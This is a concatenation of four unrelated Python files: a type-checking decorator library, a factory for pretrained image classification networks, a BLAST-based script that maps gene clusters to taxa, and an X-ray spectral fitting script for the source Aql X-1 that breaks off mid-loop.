"""Wrap function with type checks."""
def call_decorator(func: Callable[..., TypeT]) -> Callable[..., TypeT]:
if _is_wrapped_func(func):
raise TypeError('Function is already wrapped by undictify.')
signature = inspect.signature(func)
func_name = _get_log_name(func)
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> TypeT:
kwargs_dict = _merge_args_and_kwargs(signature, func_name,
args, kwargs)
return _unpack_dict( # type: ignore
func,
signature,
None,
kwargs_dict,
skip,
convert)
setattr(wrapper, '__undictify_wrapped_func__', func)
return wrapper
return call_decorator
def _get_log_name(var: Any) -> str:
"""Return var.__name__ if available, 'this object' otherwise."""
try:
return str(var.__name__)
except AttributeError:
return 'this object'
WrappedOrFunc = Callable[..., TypeT]
def _is_wrapped_func(func: WrappedOrFunc) -> bool:
return hasattr(func, '__undictify_wrapped_func__')
def _merge_args_and_kwargs(signature: inspect.Signature, name: str,
args: Any, kwargs: Any) -> Dict[str, Any]:
"""Returns one kwargs dictionary or
raises an exeption in case of overlapping-name problems."""
param_names = [param.name for param in signature.parameters.values()]
if len(args) > len(param_names):
raise TypeError(f'Too many parameters for {name}.')
args_as_kwargs = dict(zip(param_names, list(args)))
keys_in_args_and_kwargs = set.intersection(set(args_as_kwargs.keys()),
set(kwargs.keys()))
if keys_in_args_and_kwargs:
raise TypeError(f'The following parameters are given as '
f'arg and kwarg in call of {name}: '
f'{keys_in_args_and_kwargs}')
return {**args_as_kwargs, **kwargs}
def _unpack_dict(func: WrappedOrFunc, # pylint: disable=too-many-arguments
signature: inspect.Signature,
first_arg: Any,
data: Dict[str, Any],
skip_superfluous: bool,
convert_types: bool) -> Any:
"""Constructs an object in a type-safe way from a dictionary."""
assert _is_dict(data), 'Argument data needs to be a dictionary.'
ctor_params: Dict[str, Any] = {}
if not skip_superfluous:
param_names = [param.name for param in signature.parameters.values()]
argument_names = data.keys()
superfluous = set(argument_names) - set(param_names)
if superfluous:
raise TypeError(f'Superfluous parameters in call: {superfluous}')
parameter_values = list(signature.parameters.values())
if first_arg is not None:
parameter_values = parameter_values[1:]
for param in parameter_values:
if param.kind != inspect.Parameter.POSITIONAL_OR_KEYWORD:
raise TypeError('Only parameters of kind POSITIONAL_OR_KEYWORD '
'supported in target functions.')
if _is_union_type(param.annotation) \
and not _is_optional_type(param.annotation):
raise TypeError('Union members in target function other than Optional '
'are not supported.')
if _is_dict_type(param.annotation):
raise TypeError('Dict members in target function are not supported.')
if param.name not in data:
if _is_optional_type(param.annotation):
ctor_params[param.name] = None
else:
raise TypeError(f'Key {param.name} is missing.')
else:
ctor_params[param.name] = _get_value(param.annotation,
data[param.name],
param.name,
skip_superfluous,
convert_types)
if first_arg is not None:
return _unwrap_decorator_type(func)(first_arg, **ctor_params)
return _unwrap_decorator_type(func)(**ctor_params)
def _get_value(func: WrappedOrFunc, value: Any, log_name: str,
skip_superfluous: bool, convert_types: bool) -> Any:
"""Convert a single value into target type if possible."""
if _is_list(value):
return _get_list_value(func, value, log_name,
skip_superfluous, convert_types)
if _is_dict(value):
return _get_dict_value(func, value) # Use settings of inner value
allowed_types = list(map(_unwrap_decorator_type, _get_union_types(func) \
if _is_optional_type(func) \
else [func]))
if func is inspect.Parameter.empty and log_name != 'self':
raise TypeError(f'Parameter {log_name} of target function '
'is missing a type annotation.')
if Any not in allowed_types and log_name != 'self':
if not _isinstanceofone(value, allowed_types):
value_type = type(value)
if convert_types:
if _is_optional_type(func):
func = _get_optional_type(func)
try:
return func(value)
except ValueError:
raise TypeError(f'Can not convert {value} '
f'from type {_get_type_name(value_type)} '
f'into type {_get_type_name(func)} '
f'for key {log_name}.')
raise TypeError(f'Key {log_name} has incorrect type: '
f'{_get_type_name(value_type)} instead of '
f'{_get_type_name(func)}.')
return value
def _get_list_value(func: Callable[..., TypeT], value: Any,
log_name: str,
skip_superfluous: bool, convert_types: bool) -> Any:
if not _is_list_type(func) and \
not _is_optional_list_type(func):
raise TypeError(f'No list expected for {log_name}')
result = []
result_elem_type = _get_list_type_elem_type(func)
for elem in value:
result.append(_get_value(result_elem_type,
elem, value,
skip_superfluous, convert_types))
return result
def _get_dict_value(func: Callable[..., TypeT], value: Any) -> Any:
assert _is_dict(value)
if _is_optional_type(func):
return _get_optional_type(func)(**value) # type: ignore
return func(**value)
def _is_union_type(the_type: Callable[..., TypeT]) -> bool:
"""Return True if the type is a Union."""
if VER_3_7_AND_UP:
return (the_type is Union or
_is_instance(the_type, _GenericAlias) and _type_origin_is(the_type, Union))
return _is_instance(the_type, _Union)
def _is_list_type(the_type: Callable[..., TypeT]) -> bool:
"""Return True if the type is a List."""
try:
if VER_3_7_AND_UP:
return _is_instance(the_type,
_GenericAlias) and _type_origin_is(the_type, list)
return issubclass(the_type, List) # type: ignore
except TypeError:
return False
def _is_optional_list_type(the_type: Callable[..., TypeT]) -> bool:
"""Return True if the type is a Optional[List]."""
if _is_list_type(the_type):
return True
if _is_optional_type(the_type) and \
_is_list_type(_get_optional_type(the_type)):
return True
return False
def _is_dict_type(the_type: Callable[..., TypeT]) -> bool:
"""Return True if the type is a Dict."""
try:
if VER_3_7_AND_UP:
return _is_instance(the_type,
_GenericAlias) and _type_origin_is(the_type, dict)
return issubclass(the_type, Dict) # type: ignore
except TypeError:
return False
def _type_origin_is(the_type: Callable[..., TypeT], origin: Any) -> bool:
assert hasattr(the_type, '__origin__')
return the_type.__origin__ is origin # type: ignore
def _get_union_types(union_type: Callable[..., TypeT]) -> List[Callable[..., TypeT]]:
"""Return all types a Union can hold."""
assert _is_union_type(union_type)
return union_type.__args__ # type: ignore
def _get_optional_type(optional_type: Callable[..., TypeT]) -> Type[TypeT]:
"""Return the type an Optional can hold."""
assert _is_optional_type(optional_type)
args = optional_type.__args__ # type: ignore
assert len(args) == 2
return args[0] # type: ignore
def _get_type_name(the_type: Callable[..., TypeT]) -> str:
"""Return a printable name of a type."""
if _is_optional_type(the_type):
return f'Optional[{str(_get_optional_type(the_type).__name__)}]'
if _is_list_type(the_type):
return f'List[{str(_get_list_type_elem_type(the_type).__name__)}]'
return the_type.__name__
def _get_list_type_elem_type(list_type: Callable[..., TypeT]) -> Callable[..., Any]:
"""Return the type of a single element of the list type."""
if _is_optional_type(list_type):
list_type = _get_optional_type(list_type)
assert _is_list_type(list_type)
list_args = list_type.__args__ # type: ignore
assert len(list_args) == 1
return list_args[0] # type: ignore
def _isinstanceofone(value: Callable[..., TypeT], types: List[Callable[..., TypeT]]) -> bool:
"""Check if value is an instance of one of the given types."""
for the_type in types:
if _is_union_type(the_type):
if _isinstanceofone(value, _get_union_types(the_type)):
return True
try:
if _is_instance(value, the_type): # type: ignore
return True
except TypeError:
pass
return False
def _is_optional_type(the_type: Callable[..., TypeT]) -> bool:
"""Return True if the type is an Optional."""
if not _is_union_type(the_type):
return False
union_args = _get_union_types(the_type)
return len(union_args) == 2 and _is_instance(None, union_args[1])
def _is_dict(value: TypeT) -> bool:
"""Return True if the value is a dictionary."""
return isinstance(value, dict)
def _is_list(value: TypeT) -> bool:
"""Return True if the value is a list."""
return isinstance(value, list)
def _unwrap_decorator_type(func: WrappedOrFunc) -> Callable[..., Any]:
"""Get the actual type returned by the internal wrapper"""
if _is_wrapped_func(func):
return getattr(func, '__undictify_wrapped_func__') # type: ignore
return func
def _is_instance(value: TypeT, the_type: Callable[..., TypeT]) -> bool:
return isinstance(value, the_type) # type: ignore
|
import torchvision.models
from .resnext101_32x4d import resnext101_32x4d
from .inception_v4 import inception_v4
from .inception_resnet_v2 import inception_resnet_v2
from .wrn50_2 import wrn50_2
from .my_densenet import densenet161, densenet121, densenet169, densenet201
from .my_resnet import resnet18, resnet34, resnet50, resnet101, resnet152
from .fbresnet200 import fbresnet200
from .dpn import dpn68, dpn68b, dpn92, dpn98, dpn131, dpn107
from .transformed_model import TransformedModel
from .load_checkpoint import load_checkpoint
model_name_normalizer_name_mapping = {
'dpn68': 'dualpathnet',
'dpn68b': 'dualpathnet',
'dpn92': 'dualpathnet',
'dpn131': 'dualpathnet',
'dpn107': 'dualpathnet',
'resnet18': 'torchvision',
'resnet34': 'torchvision',
'resnet50': 'torchvision',
'resnet101': 'torchvision',
'resnet152': 'torchvision',
'resnet18-torchvision': 'torchvision',
'resnet34-torchvision': 'torchvision',
'resnet50-torchvision': 'torchvision',
'resnet101-torchvision': 'torchvision',
'resnet152-torchvision': 'torchvision',
'densenet121': 'torchvision',
'densenet161': 'torchvision',
'densenet169': 'torchvision',
'densenet201': 'torchvision',
'densenet121-torchvision': 'torchvision',
'densenet161-torchvision': 'torchvision',
'densenet169-torchvision': 'torchvision',
'densenet201-torchvision': 'torchvision',
'squeezenet1_0': 'torchvision',
'squeezenet1_1': 'torchvision',
'alexnet': 'torchvision',
'inception_v3': 'le',
'inception_resnet_v2': 'le',
'inception_v4': 'le',
'resnext101_32x4d': 'torchvision',
'wrn50': 'torchvision',
'fbresnet200': 'torchvision'
}
def create_model(
model_name='resnet50',
pretrained=False,
num_classes=1000,
input_size=0,
normalizer='',
drop_first_class=False,
output_fn='',
checkpoint_path='',
**kwargs):
if 'test_time_pool' in kwargs:
test_time_pool = kwargs.pop('test_time_pool')
else:
test_time_pool = True
if model_name == 'dpn68':
model = dpn68(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'dpn68b':
model = dpn68b(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'dpn92':
model = dpn92(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'dpn98':
model = dpn98(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'dpn131':
model = dpn131(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'dpn107':
model = dpn107(
num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
elif model_name == 'resnet18':
model = resnet18(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet18-torchvision':
model = torchvision.models.resnet18(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet34':
model = resnet34(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet34-torchvision':
model = torchvision.models.resnet34(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet50':
model = resnet50(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet50-torchvision':
model = torchvision.models.resnet50(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet101':
model = resnet101(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet101-torchvision':
model = torchvision.models.resnet101(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet152':
model = resnet152(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnet152-torchvision':
model = torchvision.models.resnet152(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet121':
model = densenet121(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet121-torchvision':
model = torchvision.models.densenet121(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet161':
model = densenet161(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet161-torchvision':
model = torchvision.models.densenet161(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet169':
model = densenet169(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet169-torchvision':
model = torchvision.models.densenet169(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet201':
model = densenet201(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'densenet201-torchvision':
model = torchvision.models.densenet201(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'inception_v3':
model = torchvision.models.inception_v3(
num_classes=num_classes, pretrained=pretrained, transform_input=False, aux_logits=False)
elif model_name == 'inception_resnet_v2':
model = inception_resnet_v2(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'inception_v4':
model = inception_v4(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'resnext101_32x4d':
model = resnext101_32x4d(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'wrn50':
model = wrn50_2(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'fbresnet200':
model = fbresnet200(num_classes=num_classes, pretrained=pretrained, **kwargs)
elif model_name == 'squeezenet1_0':
model = torchvision.models.squeezenet1_0(pretrained=pretrained)
elif model_name == 'squeezenet1_1':
model = torchvision.models.squeezenet1_1(pretrained=pretrained)
elif model_name == 'alexnet':
model = torchvision.models.alexnet(pretrained=pretrained)
else:
assert False and "Invalid model"
if checkpoint_path and not pretrained:
load_checkpoint(model, checkpoint_path)
if input_size or normalizer or drop_first_class or output_fn:
model = TransformedModel(
model=model,
input_size=input_size,
normalizer=normalizer,
output_fn=output_fn,
drop_first_class=drop_first_class,
)
return model
def create_model_from_cfg(mc, checkpoint_path=''):
if 'kwargs' not in mc:
mc['kwargs'] = {}
model = create_model(
model_name=mc['model_name'],
num_classes=mc['num_classes'],
input_size=mc['input_size'],
normalizer=mc['normalizer'],
output_fn=mc['output_fn'],
drop_first_class=mc['drop_first_class'],
checkpoint_path=checkpoint_path if checkpoint_path else mc['checkpoint_file'],
**mc['kwargs']
)
return model
|
#!/bin/env python
"""
Created on Thurs Mar 3 20:01:31 2016
@author: francinecamacho
"""
from Bio import SeqIO
import pandas as pd
import os
"""This script will take the tabular file as input to detect BGCs based on percent identity (95%)
and query coverage (95%) criteria to find the BGC taxa producer based on ref_seq NCBI database. The output
is a tabular result file with BGC name, percent identity, and coverage and taxa name.
"""
#Function to make a panda data frame tabular file
def makeDataFrame (PATH, perc_ident_cutoff, coverage_cutoff):
names = ['seqid', 'stitle', 'sacc', 'qseqid', 'qlen', 'qcovs','pident', 'Evalue', 'qstart','qend']
dataframe = pd.read_csv(PATH, sep = "\t", names=names, header=None)
# filter dataframe by qcovs and percent
filter_dataframe = dataframe[(dataframe.qcovs >= coverage_cutoff) & (dataframe.pident >= perc_ident_cutoff)]
# unique_bgcs= dataframe['qseqid'].unique()
return filter_dataframe
def initializeDict(bgc_list):
inital_dict = {}
for i in range(0, len(bgc_list)):
inital_dict[bgc_list[i]] = 'N/A'
return inital_dict
def mapTaxa(df, species_dict):
for index, row in df.iterrows():
bgc_name = df.at[index,'qseqid']
species = df.at[index, 'stitle']
coverage = df.at[index, 'qcovs']
accession_id = df.at[index, 'sacc']
percent_identity = df.at[index, 'pident']
species_title = species.replace(" ", "_")
species_dict[bgc_name] = [species_title, accession_id, percent_identity,coverage]
for bgc in species_dict:
if species_dict[bgc] == 'N/A':
species_dict[bgc] = ['N/A', 'N/A','0.0', '0.0']
return(species_dict)
# def updateFASTA(species_dict, fasta_file, outdir, outfile):
# os.chdir(outdir)
# bgc_fasta_file = SeqIO.parse(open(fasta_file),'fasta')
# with open(outfile, 'w') as updated_fasta:
# for seq_record in bgc_fasta_file:
# seq_id = seq_record.id
# if species_dict[seq_id][0]!= 'N/A':
# seq_record.id = seq_id + "__" + species_dict[seq_id][0]
# seq_record.description = ""
# SeqIO.write(seq_record, updated_fasta, "fasta")
# else:
# seq_record.description = ""
# SeqIO.write(seq_record, updated_fasta, "fasta")
def main(tabular_file, bgc_fasta_file, outdir, outfile, perc_ident_cutoff, coverage_cutoff):
output_df = pd.DataFrame() # initialize Data Frame
blast_df = makeDataFrame(tabular_file, perc_ident_cutoff, coverage_cutoff)
bgc_fasta_file_seqIO = SeqIO.parse(bgc_fasta_file, "fasta")
bgc_list = [record.id for record in bgc_fasta_file_seqIO ]
bgc_dict = initializeDict(bgc_list)
print(bgc_dict)
species_result_dict = mapTaxa(blast_df, bgc_dict)
df2 = [(k, v[0], v[1], v[2], v[3]) for k, v in list(species_result_dict.items())]
output_df = output_df.append(df2) # append list to our initalized dataframe
os.chdir(outdir)
output_df.columns = ["BGC_NAME", "TAXA_NAME", "ACC_ID", "PERC_IDENT", "COVERAGE"] # rename column names
output_df.to_csv(outfile, index=False, sep='\t') # write dataframe to csv format (text file)
# updateFASTA(species_result_dict, bgc_fasta_file, outdir, outfile)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--tabular_file', type =str, required=True)
parser.add_argument('--bgc_fasta_file', type =str, required=True)
parser.add_argument('--outdir', type= str)
parser.add_argument('--outfile', type= str, required=True)
parser.add_argument('--perc_ident_cutoff', type= int, required=False, default=95)
parser.add_argument('--coverage_cutoff', type= int, required=False, default=95)
args = parser.parse_args()
main(args.tabular_file, args.bgc_fasta_file, args.outdir, args.outfile, args.perc_ident_cutoff, args.coverage_cutoff) |
import glob as gl
from astropy.io import ascii
from astropy.table import Table
from astropy.io import fits
from astropy.time import Time
import os
import numpy as np
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
import pandas as pd
# plotting the spectra, must be corrected :
def create_plots(components, x_max, x_min, ymax, ymin,index):
print('Now Plotting the Spectrum')
plot_fit_delchi(1,clearwindow=True, color='Black')
fig=plt.gcf()
ax1,ax2=fig.axes
ax1.set_title(source_name+' BID:'+str(bid)+' MJD:'+str(mjdobs)+' Model:'+str(components))
ax1.set_yscale('log')
ax1.set_xscale('log')
ax2.set_xscale('log')
ax2.set_xlabel('Energy [keV]', fontsize=14)
ax1.set_ylabel('Counts/sec/keV', fontsize=14)
ax2.set_ylabel('Sigma', fontsize=14)
ax1.set_xlim(x_min,x_max)
ax2.set_xlim(x_min,x_max)
plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full.pdf',orientation='landscape', papertype='a4')
plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full.png',orientation='landscape', papertype='a4')
plot_fit(1,clearwindow=True,xlog=True,ylog=True, color='Black')
if "db1" in components:
plot_model_component("nh*db1", replot=False, overplot=True, color='Green')
if "po1" in components:
plot_model_component("nh*po1", replot=False, overplot=True, color='Red')
if "bb1" in components:
plot_model_component("nh*bb1", replot=False, overplot=True, color='Black')
if "g1" in components:
plot_model_component("nh*g1", replot=False, overplot=True, color='Blue')
if "comp1" in components:
plot_model_component("nh*comp1", replot=False, overplot=True, color='Orange')
plt.title(source_name+' BID:'+str(bid)+' MJD:'+str(mjdobs)+' Model:'+str(components))
plt.xlabel('Energy [keV]', fontsize=14)
plt.ylabel('Counts/sec/keV', fontsize=14)
plt.xlim(x_min,x_max)
plt.ylim(ymin,ymax)
plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full_comp.pdf',orientation='landscape', papertype='a4')
plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full_comp.png',orientation='landscape', papertype='a4')
print('Spectra Plotted and files are created')
# first the constants :
source_name = 'Aql_X-1'
# enter here the burstid of the burst you would like to fit :
bid = '22'
mine=input('Enter the minimum energy of the fits :')
mines = ":"+mine
maxe=input('Enter the maximum energy of the fits :')
maxes = maxe+":"
folder = '/home/hea/ownCloud/burst_characterization_v4/'
sfolder = '/home/hea/ownCloud/burst_characterization_v4/scripts/'
burst_folder=folder+source_name+'/burst'+bid+'/'
#pers_folder = burst_folder+'/pers_analysis/'
#bkgfile = gl.glob(pers_folder+'*3c50*.pha.pi')
bkgfile = gl.glob(burst_folder+'*3c50*.pha.pi')
pre_post='pre_pers.pha'
set_stat("chi2xspecvar")
set_covar_opt("sigma",1.0)
set_conf_opt('numcores', 20)
set_conf_opt("max_rstat",250.0)
set_covar_opt('sigma',1.0)
# this script will simply fit the persistent emission of the source via several models and try list them in a table.
'''
(xstbabs.nh * (xsdiskbb.db1 + xspowerlaw.p1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
po1.PhoIndex thawed 1 -2 9
po1.norm thawed 1 0 1e+24
(xstbabs.nh * ((xsdiskbb.db1 + xspowerlaw.p1) + xsgaussian.g1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
po1.PhoIndex thawed 1 -2 9
po1.norm thawed 1 0 1e+24
g1.LineE thawed 6.5 0 1e+06 keV
g1.Sigma thawed 0.1 0 10 keV
g1.norm thawed 1 0 1e+24
(xstbabs.nh * (xsdiskbb.db1 + xsbbodyrad.bb1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
bb1.kT thawed 3 0.001 100 keV
bb1.norm thawed 1 0 1e+24
(xstbabs.nh * ((xsdiskbb.db1 + xsbbodyrad.bb1) + xsgaussian.g1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
bb1.kT thawed 3 0.001 100 keV
bb1.norm thawed 1 0 1e+24
g1.LineE thawed 6.5 0 1e+06 keV
g1.Sigma thawed 0.1 0 10 keV
g1.norm thawed 1 0 1e+24
(xstbabs.nh * xscomptt.comp1)
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
comp1.redshift frozen 0 -0.999 10
comp1.T0 thawed 0.1 0.01 100 keV
comp1.kT thawed 50 2 500 keV
comp1.taup thawed 1 0.01 100
comp1.approx frozen 1 0 5
comp1.norm thawed 1 0 1e+24
'''
# the models to be fit, these are also individual cases :
models = ['xstbabs.nh*(xsdiskbb.db1+xspowerlaw.po1)',
'xstbabs.nh*(xsdiskbb.db1+xspowerlaw.po1+xsgaussian.g1)',
'xstbabs.nh*(xsdiskbb.db1+xsbbodyrad.bb1)','xstbabs.nh*(xsdiskbb.db1+xsbbodyrad.bb1+xsgaussian.g1)'
,'xstbabs.nh*(xscomptt.comp1)']
# the columns of the resulting table can be :
# Source Name, BurstID, MJD, DATEOBS, EXP, PRE/POST, model_name, NH, minNH, maxNH, Tin/T0, minTin, maxTin, dbb_norm, mindbb_norm, maxdbb_norm,
# phoind/bb1kT/compkT, minphoind, maxphoind, pow_norm, minpow_norm, maxpow_norm, g1lineE,ming1lineE, maxg1lineE, g1sigma, ming1sigma, maxg1sigma, g1norm, ming1norm, maxg1norm,
# comptau, mincomptau, maxcomptau, compnorm, mincompnorm, maxcompnorm, total_flux, mintotal_flux, max_total_flux, mine, maxe, chi2, dof, rchi
col_names = ["Source Name", "BurstID", "MJD", "DATEOBS", "EXP",\
"PRE/POST", "model_name", "NH", "minNH", "maxNH","Tin/T0",\
"minTin", "maxTin", "dbb_norm", "mindbb_norm", \
"maxdbb_norm", "phoind/bb1kT/compkT", "minphoind", "maxphoind", \
"pow_norm", "minpow_norm", "maxpow_norm", "g1lineE", "ming1lineE",\
"maxg1lineE", "g1sigma", "ming1sigma", "maxg1sigma",\
"g1norm", "ming1norm", "maxg1norm", "comptau",\
"mincomptau", "maxcomptau", "total_flux",\
"mintotal_flux", "maxtotal_flux", "mine", "maxe","chi2", "dof", "rchi2"]
# definition of the dictionary to keep the best fit parameters :
data_frame = {col: [0]*len(models) for col in col_names}
for i in range(len(models)):
# first lets try the pre spectrum :
spec = gl.glob(burst_folder+pre_post)
sp_hdu = fits.open(spec[0])
print('read src spec: '+str(spec[0]))
mjdobs = sp_hdu[1].header['MJD-OBS']
date_obsi = sp_hdu[1].header['DATE-OBS']
exposure = sp_hdu[1].header['EXPOSURE']
obsid = sp_hdu[1].header['OBS_ID']
date_obs = str(Time(date_obsi,format='isot', scale='utc'))
data_frame["Source Name"][i]=source_name
data_frame["BurstID"][i] = bid
data_frame["MJD"][i] = mjdobs
data_frame["DATEOBS"][i] = date_obs
data_frame["EXP"][i]=exposure
data_frame["mine"][i] = mine
data_frame["maxe"][i] = maxe
data_frame["PRE/POST"][i] = pre_post
data_frame["model_name"][i]=models[i]
# first for the pre burst spectrum :
load_pha(1, str(spec[0]),use_errors=True)
load_arf(1, sfolder+'nixtionaxis20170601_combined_v004_1434.arf')
load_rmf(1, sfolder+'nixti20170601_combined_v002_1434.rmf')
#load_arf(1, sfolder+'nixtionaxis20170601_combined_v004.arf')
#load_rmf(1, sfolder+'nixti20170601_combined_v002.rmf')
load_bkg(1, bkgfile[0],use_errors=True)
subtract()
print('This script only subtracts ni3C50 background')
print('Ignoring : '+mines+' '+maxes)
ignore(mines+','+maxes)
print('Grouping the data to have at least 50 counts per channel')
group_counts(1, 50)
plot_data()
x_max=max(get_data_plot().x)+max(get_data_plot().x)*0.05
x_min = np.abs(min(get_data_plot().x)-min(get_data_plot().x)*0.05)
ymax = max(get_data_plot().y)+max(get_data_plot().y)*0.2
ymin = np.abs(min(get_data_plot().y)-min(get_data_plot().y)*0.05)
set_source(models[i])
if i == 4:
comp1.redshift=0.0
freeze(comp1.redshift)
comp1.approx=1.1
freeze(comp1.approx)
thaw(comp1.T0)
thaw(comp1.kT)
thaw(comp1.norm)
comp1.norm=1e-2
if ((i == 1) or (i == 3)):
g1.LineE = 6.4
g1.Sigma.min=0.01
g1.Sigma.max=0.7
g1.norm=1e-3
g1.LineE.min=6.0
g1.LineE.max=7.0
nh.nH=1.0
freeze(nh.nh)
db1.Tin=0.8
freeze(db1.Tin)
fit()
thaw(nh.nH)
thaw(db1.Tin)
set_method('moncar')
fit()
set_method('levmar')
fit()
conf()
# we must record the outputs here withe something like the following :
chi = get_fit_results().statval
dof = get_fit_results().dof
parvals = np.array(get_conf_results().parvals)
parnames = np.array(get_conf_results().parnames)
parmins = np.array(get_conf_results().parmins)
parmaxes = np.array(get_conf_results().parmaxes)
data_frame['chi2'][i] = chi
data_frame['dof'][i] = dof
data_frame['rchi2'][i] = chi/dof
data_frame['NH'][i] = parvals[0]
data_frame['minNH'][i] = parmins[0]
data_frame['maxNH'][i] = parmaxes[0]
data_frame["Tin/T0"][i] = parvals[1]
data_frame["minTin"][i] = parmins[1]
data_frame["maxTin"][i] = parmaxes[1]
data_frame["dbb_norm"][i]= parvals[2]
data_frame["mindbb_norm"][i] = parmins[2]
data_frame["maxdbb_norm"][i] = parmaxes[2]
data_frame["phoind/bb1kT/compkT"][i] = parvals[3]
data_frame["minphoind"][i] = parmins[3]
data_frame["maxphoind"][i] = parmaxes[3]
data_frame["pow_norm"][i] = parvals[4]
data_frame["minpow_norm"][i] = parmins[4]
data_frame['maxpow_norm'][i] = parmaxes[4]
if ((i == 1) or (i == 3)):
data_frame['g1lineE'][i] = parvals[5]
data_frame['ming1lineE'][i] = parmins[5]
data_frame['maxg1lineE'][i] = parmaxes[5]
data_frame['g1sigma'][i] = parvals[6]
data_frame['ming1sigma'][i] = parmins[6]
data_frame['maxg1sigma'][i] = parmaxes[6]
data_frame['g1norm'][i]=parvals[7]
data_frame['ming1norm'][i]=parmins[7]
data_frame['maxg1norm'][i]=parmaxes[7]
if i == 4:
data_frame["Tin/T0"][i] = parvals[1]
data_frame["minTin"][i] = parmins[1]
data_frame["maxTin"][i] = parmaxes[1]
data_frame["phoind/bb1kT/compkT"][i] = parvals[2]
data_frame["minphoind"][i] = parmins[2]
data_frame["maxphoind"][i] = parmaxes[2]
data_frame["comptau"][i] = parvals[3]
data_frame["mincomptau"][i] = parmins[3]
data_frame["maxcomptau"][i] = parmaxes[3]
data_frame["pow_norm"][i] = parvals[4]
data_frame["minpow_norm"][i] = parmins[4]
data_frame["maxpow_norm"][i] = parmaxes[4]
# now the flux :
if i == 4:
covar()
cparmins = np.array(get_covar_results().parmins)
cparmaxes = np.array(get_covar_results().parmaxes)
if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
try:
sample_bol=sample_flux(comp1,0.01,200.0, num=1000, correlated=True,confidence=68)
data_frame["total_flux"][i] = sample_bol[1][0]
data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
except:
data_frame["total_flux"][i] = 0
data_frame["mintotal_flux"][i] = 0
data_frame["maxtotal_flux"][i] = 0
create_plots(["comp1"], x_max, x_min, ymax, ymin,i)
if i == 0:
covar()
cparmins = np.array(get_covar_results().parmins)
cparmaxes = np.array(get_covar_results().parmaxes)
if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
try:
sample_bol=sample_flux(db1+po1,0.01,200.0, num=1000, correlated=True,confidence=68)
data_frame["total_flux"][i] = sample_bol[1][0]
data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
except:
data_frame["total_flux"][i] = 0
data_frame["mintotal_flux"][i] = 0
data_frame["maxtotal_flux"][i] = 0
create_plots(["dbb","po1"],x_max,x_min,ymax, ymin,i)
if i == 1:
covar()
cparmins = np.array(get_covar_results().parmins)
cparmaxes = np.array(get_covar_results().parmaxes)
if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
try:
sample_bol=sample_flux(db1+po1+g1,0.01,200.0, num=1000, correlated=True,confidence=68)
data_frame["total_flux"][i] = sample_bol[1][0]
data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
except:
data_frame["total_flux"][i] = 0
data_frame["mintotal_flux"][i] = 0
data_frame["maxtotal_flux"][i] = 0
